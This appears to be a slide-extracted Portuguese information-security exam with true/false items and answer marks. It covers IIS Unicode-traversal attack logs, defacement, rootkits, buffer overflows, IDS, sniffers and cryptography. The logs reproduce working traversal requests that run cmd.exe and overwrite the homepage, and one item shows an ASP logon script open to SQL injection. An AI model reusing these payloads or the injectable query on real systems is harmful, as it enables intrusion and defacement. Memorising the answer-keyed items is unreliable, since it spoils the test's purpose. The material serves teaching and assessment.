  11. 11. /IISADMPWD/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af...%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 200 607atacker5.nowhere.com - - [23/Jan/2001:04:29:00 -0200] "GET/IISADMPWD/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af...%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c+dir+c:inetpub HTTP/1.1" 200 493atacker5.nowhere.com - - [23/Jan/2001:04:29:06 -0200] "GET/IISADMPWD/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af...%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c+dir+c:inetpubwwwroot HTTP/1.1" 200 828atacker6.nowhere.com - - [23/Jan/2001:04:30:02 -0200] "GET/IISADMPWD/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af...%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c+copy+c:winntcmd.exe+c:winnts3.exeHTTP/1.0" 502 259atacker6.nowhere.com - - [23/Jan/2001:04:32:29 -0200] "GET/IISADMPWD/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af...%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c+copy+c:winntcmd.exe+c:winntcmd.exeHTTP/1.0" 502 259atacker6.nowhere.com - - [23/Jan/2001:04:33:36 -0200] "GET/IISADMPWD/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af...%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c+copy+c:winntsystem32cmd.exe+c:winnts3.exeHTTP/1.0" 502 242atacker6.nowhere.com - - [23/Jan/2001:04:34:11 -0200] "GET/IISADMPWD/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af...%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c+echo+H4ck3d+by+Gund3R0th+thanks+Gund3R1th+Grup+WebQu33R+>c:inetpubwwwrootDefault.htm HTTP/1.0" 500 87atacker6.nowhere.com - - [23/Jan/2001:04:34:28 -0200] "GET/IISADMPWD/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af...%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c+echo+H4ck3d+by+Gund3R0th+thanks+Gund3R1th+Grup+WebQu33R+>c:inetpubwwwrootDefault.htm HTTP/1.0" 500 87atacker6.nowhere.com - - [23/Jan/2001:04:35:55 -0200] "GET/IISADMPWD/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af...%c0%af..%c0%af..%c0%af/winnt/system32/s3.exe?/c+echo+H4ck3d+by+Gund3R0th+thanks+Gund3R1th+Grup+WebQu33R+>c:inetpubwwwrootDefault.htm HTTP/1.0" 404 461atacker6.nowhere.com - - [23/Jan/2001:04:37:34 -0200] "GET/IISADMPWD/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af...%c0%af..%c0%af..%c0%af/winnt/s3.exe?/c+echo+H4ck3d+by+Gund3R0th+thanks+Gund3R1th+Grup+WebQu33R+>c:inetpubwwwrootDefault.htm HTTP/1.0" 502 215atacker6.nowhere.com - - [23/Jan/2001:04:40:09 -0200] "GET/IISADMPWD/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af...%c0%af..%c0%af..%c0%af/winnt/s3.exe?/c+echo+H4ck3d+by+Gund3R0th+thanks+Gund3R1th+Grup+WebQu33R+>c:inetpubwwwrootDefault.htm HTTP/1.0" 502 215atacker6.nowhere.com - - [23/Jan/2001:04:40:30 -0200] "GET/IISADMPWD/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af...%c0%af..%c0%af..%c0%af/winnt/s3.exe?/c+echo+H4ck3d+by+Gund3R0th+thanks+Gund3R1th+Grup+WebQu33R+>c:inetpubwwwrootmyweb.dll HTTP/1.0" 502 215atacker4.nowhere.com - - [23/Jan/2001:04:40:51 -0200] "GET/IISADMPWD/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af...%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 200 880atacker6.nowhere.com - - [23/Jan/2001:04:44:38 -0200] "GET/IISADMPWD/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af...%c0%af..%c0%af..%c0%af/winnt/s3.exe?/c+echo+H4ck3d+by+Gund3R0th+thanks+Gund3R1th+Grup+WebQu33R+>c:inetpubwwwrootmyweb.dll HTTP/1.0" 502 21536 - Com base no texto CE, julgue os itens abaixo, referentes aos ataques ao servidor http mencionadonesse texto. E1 As tentativas exploratórias começaram a ter sucesso a partir de 23/1/2001. C2 Verifica-se ataque de defacement (pichação) a página Web. C3 A vulnerabilidade explorada nos ataques é a do parsing das requisições de arquivo em servidores Web, também conhecida como ataquede unicode, presente no MS IIS versão 5.0. E4 Os logs foram gerados pelo MS IIS. E5 O atacante fez uma cópia de backup da página original.37 - Novamente com base no texto CE e acerca dos ataques ao servidor http referido, julgue os itens aseguir. C1 Nos probes exploratórios, o atacante vasculhou diversos diretórios, procurando o arquivo ―cmd.exe‖, que é um interpretadorde comandos. C2 ―Atacker‖ copiou ―cmd.exe‖ em outro arquivo, que posteriormente foi usado no ataque.
  12. 12. E3 A página inicial do servidor Web atacado residia em ―Default.htm‖. C4 O servidor utiliza uma forma elementar de defesa, mantendo a página de index em ―myweb.dll‖. C5 ―Atacker6‖ teve sucesso no ataque.38 - Ainda com base no texto CE, julgue os itens subseqüentes, relativos ao servidor http e aos ataquesocorridos. C1 A página vulnerada se apresentou em branco com os dizeres ―H4ck3d by Gund3R0th thanks Gund3R1th Grup WebQu33R‖. E2 Os ataques não poderiam ser evitados utilizando-se um proxy que restringisse os acessos à página inicial. E3 Não há patch disponível, atualmente, para corrigir a vulnerabilidade em questão, que seja fornecido pelo autor/fornecedor doservidor Web. C4 Um dos elementos dos ataques está no fato de o diretório ―system32‖ ter seu acesso liberado, na configuração default do sistemaoperacional. E5 Os ataques poderiam ter sido evitados por meio de filtragem de pacotes em um firewall convencional.39 - O administrador da rede Alfa recebeu diversas reclamações, de administradores de outras redes, deque uma de suas máquinasestaria gerando tráfego suspeito. A máquina em questão é um servidor Unix,servidor03 (endereço IP 192.168.11.1). Abaixo, sãomostradas as porções relevantes dos resultados daexecução, no referido servidor, de alguns comandos.Além das informações acima, em uma inspeção dos módulos carregados no kernel, não foi apontadanenhuma anormalidade. Nesse caso,é correto concluir que o servidor03 sofreu um comprometimento deroot e que C1não se trata de um rootkit na forma de um LKM. E2um telnet na porta 12345 do servidor03 chamará o programa suspeito, sendo a melhor forma de avaliar o que ele faz. C3o programa suspeito executa um unlink antes de se tornar daemon, evitando aparecer no sistema de arquivos. E4é carregado no boot, acarretando, assim, o comprometimento de algum arquivo de inicialização. C5as cadeias de caracteres podem ser inspecionadas, caso a imagem executável do programa suspeito possa ser localizada no sistema dearquivos /proc.40 - Com relação aos comprometimentos de máquinas originados a partirda exploração de umasobrecarga de buffer (buffer overflow), julgueos itens abaixo. E1 A ocorrência de comprometimento está restrita aos sistemas decódigo aberto. E2 O comprometimento independe da linguagem utilizada naimplementação do programa específico que tem seu buffersobrecarregado. E3 Pode-se evitar o buffer overflow utilizando-se firewalls na proteçãodas máquinas. C4 O buffer overflow consiste em injetar uma cadeia de caractereslonga o suficiente para ocupar totalmente o buffer atacado,seguindo-se uma chamada de sistema que executa o códigomalicioso. C5 O buffer overflow genérico utiliza, na sua implementação, o fato deque, na cadeia de caracteres do buffer, só podem ocorrer caracteresdistintos do delimitador de cadeias, sendo, então, normalmenteutilizado no preenchimento do buffer o código correspondente aoNOOP do sistema-alvo, facilitando a estimação do endereço deretorno da chamada de sistema.
  13. 13. 41 - Um administrador recebeu a tarefa de instalar um sistema dedetecção de intrusão (IDS) adequadoem sua rede. Considerandoque a rede utiliza apenas comutadores (switches), é corretoafirmar que oadministrador 1 não conseguirá executar a tarefa com sucesso, já que, noswitch, ao contrário do hub, cada porta tem um domínio decolisão distinto. 2 pode, na implantação do sistema IDS, configurar comsucesso o switch para modo debug, ou equivalente, em queo mesmo passa a operar como hub, sem prejuízo aodesempenho. 3 pode, na configuração do sistema IDS, espelhar as portas doswitch para a porta de backbone, normalmente usada parauplink/downlink, se houver, não precisando se preocupar como tráfego de todas as portas convergindo para a porta em queestá o sensor do IDS. 4 pode instalar, na máquina em que rodará o IDS, um móduloque envie periodicamente pacotes ARP de resposta,contendo o endereço MAC do sensor do IDS e o endereço IPde todas as máquinas que deseja proteger com o IDS, nãoprecisando reconfigurar o switch. 5 pode instalar, na máquina em que rodará o IDS, um móduloque envie periodicamente pacotes ARP de resposta, contendoendereços MAC fictícios para assim preencher totalmente atabela de endereços físicos do switch, acarretando, porém,prejuízo ao desempenho.42 - Considere uma página Web utilizada por um grupo de usuários paraalimentar um banco de dadosSQL Server. Os usuários realizam o logonsobre uma conexão SSL e, se autenticados, podem inseririnformações e(ou)realizar consultas no banco de dados, que, após as inserções, envia comoretorno um e-mail de confirmação. O firewall interno só aceita conexões nasportas 443 e 25, nos dois extremos daDMZ. Alguns trechos de códigocorrespondentes a essa página e ao script de logon são mostrados aseguir. •página Web <form name="Logon" method="post"action="https://www.bigbucks.org/scripts/Logon.asp> <p><font face="Tahoma"><i><b>Please enter username andpassword:</b></i><br> Username <input type="text" name="uname" maxlength="25"> <br> <br> Password <input type="text" name="pword" maxlength="25"> <br> </font></p> <p> <input type="submit" name="Submit" value="Submit"> </p> </form> •script de logon Conn.Open Set rst= Conn.Execute("select * from userinfo whereusername = " &Request.Form("uname") & " and password = &Request.Form("uname") & " "If rst.eof then Response.Redirect "badlogon.asp" Com base nessas informações, julgue os itens seguintes. 1 Independentemente do que possa acontecer com as informações dobanco de dados, é correto afirmar que o servidor hospedeiro desse bancode dados é seguro, já que as conexões são encriptadas e os acessos sãointermediados pelo servidor Web. 2 A simplicidade com que os dados de entrada são validados, repassando-os diretamente para a montagem do statement SQL, atesta o bom designda solução do controle de acesso, pois o código é facilmente auditável. 3 A crítica inexistente aos dados fornecidos por um usuário permite que semonte consultas que resultariam no fornecimento das tabelas com asinformações dos usuários. 4 Na situação apresentada, é possível forçar o banco de dados a enviar ume-mail com tabelas inteiras. 5 Alguém desautorizado pode alterar as informações do banco de dados.44 – Considere uma rede em que há a suspeita da existência deum sniffer instalado em uma dasmáquinas que compõema rede, realizando escutas desautorizadas. Com relação aessa situação, julgueos itens abaixo. 1 Constitui boa estratégia de detecção de sniffer aquelaque se fundamenta na identificação do tráfego geradopor ele durante a escuta, tráfego que normalmenteacontece em grande quantidade, seja o sniffer em redescomutadas ou não. 2 Pode-se detectar a existência de um sniffer narede usando-se outro sniffer e verificando quem fazconsultas de DNS quando uma nova máquina éadicionada à rede. 3 Na identificação de um snnifer, constitui boa estratégiao envio de pings em broadcaste a comparação dostempos de resposta das várias máquinas no segmento:o tempo de resposta da máquina que contém snifferprovavelmente será maior que o das outras máquinas. 4 Um sniffer comum — passivo — em uma redecomutada consegue capturar tráfego.
  14. 14. 5 A detecção de um sniffer quase sempre acontece comsucesso, sendo a sua identificação fundamentada noendereço MAC.47 - As técnicas de criptografia constituem os recursos básicos paraimplementação de boa parte dasferramentas que disponibilizamserviços de segurança para os níveis de rede, sistema eserviços(aplicações). Assim, os riscos para cada serviço de segurança estãomuitas vezes associados aosriscos de quebra dos sistemas ealgoritmos criptográficos utilizados. Acerca de técnicas de quebradesistemas e algoritmos criptográficos e seus riscos, julgue os itensa seguir. 1 A quebra de sistemas criptográficos simétricos sempre dependeda descoberta da chave secreta utilizada no processocriptográfico. 2 Um princípio básico para a utilização de senhas em serviços desegurança, tais como autentificação e controle de acesso,consiste em não armazenar a senha diretamente pois o acesso atal entidade de armazenamento poria em risco toda a segurançado sistema. Ao contrário, é armazenado um resumo da senha,gerado normalmente por algum tipo de função digestoraunidirecional. Ataques de força bruta a esses sistemas podem serbem sucedidos, caso se encontre a mensagem original utilizadana entrada da função (isto é, a senha) ou alguma outramensagem que resulte em um mesmo resumo que aquele geradopara a mensagem original. 3 Em uma infra-estrutura de chave pública (ICP), a quebra docertificado (violação da chave privada) de uma autoridadecertificadora (AC) invalida todos os certificados assinados poresta AC. Assim, toda a segurança da ICP depende da segurançada chave privada da AC raiz. 4 Chaves criptográficas consideradas seguras contra ataques deforça bruta, para os padrões de processamento atuais, devempossuir pelo menos 128 bits, tanto para criptografia simétricaquanto para criptografia assimétrica. 5 Sistemas que utilizam assinaturas digitais para provisão deserviços de autentificação e não- repúdio são também imunes aataques de negação de serviço por repetição (replay).48 - Um sistema criptográfico é constituído por uma tripla (M,K,C), emque M é o espaço das mensagens,K é o espaço das chaves, e C éo espaço dos criptogramas. Associado a esses, tem-se umalgoritmocriptográfico, o qual transforma qualquer mensagem m 0 M em umcriptograma c 0 C, de formacontrolada por uma chave k 0 K. Pode-se representar essa transformação por c = Ek(m), quecorrespondeà operação de cifração, e por m = Dk(c), a operação inversa, dedecifração. A respeito desistemas criptográficos em geral, julgueos itens subseqüentes. 1 Em um determinado sistema criptográfico, para cada mensagempossível m, existe apenas um criptograma possível, c, que seráo resultado da cifração de m com determinada chave k. Nãoobstante, mensagens distintas podem resultar em um mesmo criptograma, se utilizadas chaves distintas. 2 Sistemas criptográficos são ditos simétricos ou de chave secretaquando a chave utilizada para cifrar é a mesma utilizada paradecifrar. Sistemas assimétricos ou de chave pública utilizamchaves distintas para cifrar e decifrar. Algoritmos simétricos são geralmente mais eficientes computacionalmente que osassimétricos e por isso são preferidos para cifrar grandes massasde dados ou para operações online. 3 Diz-se que um sistema criptográfico tem segredo perfeitoquando, dado um criptograma c, a incerteza que se tem emrelação à mensagem m que foi cifrada é a mesma que se tinhaantes de conhecer o criptograma. Uma condição necessária paraque um sistema criptográfico tenha segredo perfeito é que oespaço de chaves seja pelo menos tão grande quanto o espaçode mensagens, ou seja, |K| $ |M|. 4 O único sistema criptográfico matematicamente inviolável é odenominado sistema de chave única. Todos os demais sistemas,para utilização em condições reais de aplicação, sãoteoricamente violáveis, ou seja, dados recursos e tempoilimitados e quantidade suficiente de criptograma gerado comuma mesma chave, é possível, sempre, determinar, de formaunívoca, a chave utilizada. 5 Uma técnica eficiente para tornar um sistema criptográfico maisforte é se utilizar um algoritmo de compressão de dados após acifração.49 - Em um ambiente de segurança de informações, senhas e chavescriptográficas devem serimprevisíveis e, preferencialmente,geradas de forma totalmente aleatória. Todo sistemacriptográficoapresenta o conhecido problema de gerenciamento de chaves, quetrata da geração, dadistribuição, do armazenamento e da troca daschaves utilizadas. Costuma-se considerar que a segurançade umalgoritmo criptográfico está na segurança das chaves utilizadas.Com relação a esse assunto, julgueos itens que se seguem. 1 Para um determinado sistema criptográfico que utiliza chaves de128 bits, optou-se por selecionar como gerador de chaves asaída do algoritmo MD5, tendo por entrada os seguintesparâmetros: a data/hora do sistema quando da geração da chave,dada na forma DDMMAAHHMMSS, com o significado usual,concatenado com uma seqüência de 16 bytes consecutivosobtida de um arquivo fixo, contendo 64 kilobytes de dados queforam gerados de forma totalmente aleatória, e cujo pontoinicial de leitura é escolhido a partir de caracteres digitados porum operador da forma mais imprevisível possível. Nessasituação, como o algoritmo MD5 gera um hash de 128 bits enão se pode, em princípio, determinar a entrada dada a
  15. 15. saída,pode-se considerar esse como um bom método para a geraçãodos 128 bits necessários para uma chave com uma aparência aleatória. 2 O algoritmo DES é considerado inseguro por possuir um espaçode chaves de apenas 56 bits, sendo, portanto, susceptível aataques por exaustão das chaves, utilizando-se recursosrelativamente modestos com a tecnologia disponível atualmente.Uma forma encontrada para aumentar o espaço de chaves dealgoritmos de bloco do tipo DES foi a implementaçãodenominada triplo-DES, em que se emprega o mesmo algoritmo3 vezes consecutivas, potencialmente com 3 chaves distintas, oque permite uma chave total efetiva correspondente a 3 vezes otamanho original, ou seja, nesse caso, 168 bits. Por raciocíniosemelhante, o uso de um duplo-DES deve prover uma segurançaequivalente a um algoritmo com chave efetiva de 112 bits. 3 Um tipo de função essencial para uso em ambiente criptográficoé a das denominadas funções unidirecionais. Uma funçãounidirecional é uma transformação fixa (sem chaves) para a qualé impraticável se determinar a entrada a partir da saída. Umaforma de se obter uma boa função unidirecional é tomar umbom algoritmo criptográfico, fixar a entrada de dados(mensagem) e utilizar a entrada de chave como entrada dedados. 4 O algoritmo RSA é um conhecido e popular algoritmoassimétrico. A segurança do algoritmo RSA é dada pelotamanho das chaves utilizadas, da ordem de 1 kilobits, o que torna impraticável a determinação da chave pela exaustão daspossibilidades. 5 Ao comparar sistemas criptográficos simétricos e assimétricos,conclui-se que aqueles facilitam a geração e a troca das chaves,enquanto estes facilitam a distribuição e o armazenamento dasmesmas.50 - Certificados digitais são documentos eletrônicos concebidos parase verificar a autenticidade de umusuário e assegurar que eleefetivamente tem a posse de um par de chaves (pública e privada)para umdeterminado sistema criptográfico de chaves assimétricas.Certificados digitais são usualmente emitidospor uma terceira parteconfiável, denominada autoridade certificadora (AC). Com relaçãoà utilização decertificados digitais para prover maior segurança aum ambiente computacional, julgue os itens abaixo. C-1 Certificados digitais se baseiam no conceito de assinaturadigital. O mecanismo usual para se assinar um documentoeletrônico é primeiro gerar o hash do documento e então cifraresse hash com um algoritmo assimétrico, utilizando-se suachave privada. O valor assim obtido constitui a assinatura, queirá permitir, posteriormente, não apenas verificar a autoria dodocumento como também a sua integridade. E-2 O padrão de certificados largamente utilizado hoje em dia é oX.509, em sua versão 3. Um certificado gerado nesse padrãoinclui, essencialmente, um identificador da versão utilizada paragerar o certificado (1, 2 ou 3); um número serial que deve serúnico para cada certificado emitido por dada AC; umidentificador do algoritmo de assinatura utilizado pela AC; umidentificador da AC (DN – distinguished name da AC); períodode validade do certificado; um identificador do sujeito (DN –distinguished name do sujeito) para o qual está sendo emitidoo certificado; a chave pública do sujeito; a chave privada dosujeito; outras informações opcionais padronizadas; por fim, aprópria assinatura da AC desse conjunto de informações. C-3 Certificados digitais são comumente emitidos para pessoas(físicas ou jurídicas), máquinas e processos. A utilização doscertificados requer o estabelecimento do que se denomina umaInfraestrutura de Chaves Públicas (ICP), como recentementeestabelecido pelo governo brasileiro, a ICP-Brasil. ICPs comoa ICP-Brasil pressupõem a existência de pelo menos uma AC,cujo próprio certificado é auto-assinado, ou seja, ela própriaatesta sua identidade e a detenção de seu par de chavesassimétricas, sendo ao mesmo tempo, para esse fim, emissor esujeito no ato de certificação. C-4 A Internet já dispõe de recursos básicos para a utilização decertificados digitais por meio do protocolo SSL (Secure SocketsLayer), desenvolvido pela empresa Netscape com vistas aodesenvolvimento do comércio eletrônico, e, mais recentemente,o TLS (Transport Layer Security), desenvolvido a partir do SSLcomo um padrão do IETF (Internet Engineering Task Force).A utilização do SSL/TLS permite: a autentificação mútua daspartes em comunicação por meio da verificação de seuscertificados digitais apresentados no início de uma sessão; oestabelecimento de uma chave simétrica segura para serutilizada entre as partes naquela sessão; a cifração com umalgoritmo simétrico de toda a comunicação de dados, de formatransparente, no qual é utilizada a chave previamenteestabelecida. C-5 Um dos pontos sensíveis na utilização de um sistema de chavespúblicas é a geração do par de chaves de um usuário. Nãosomente o processo de geração deve resultar em uma chaveprivativa imprevisível, como esta deve ficar tão-somente sob aguarda de seu proprietário, com a maior segurança possível.O comprometimento da chave privativa de um usuário ou oacesso à mesma por terceiros compromete a segurança em suautilização. Uma forma segura para a geração e a guarda dechaves e certificados disponível atualmente é o uso de cartõesinteligentes (smart cards) para tal finalidade.

×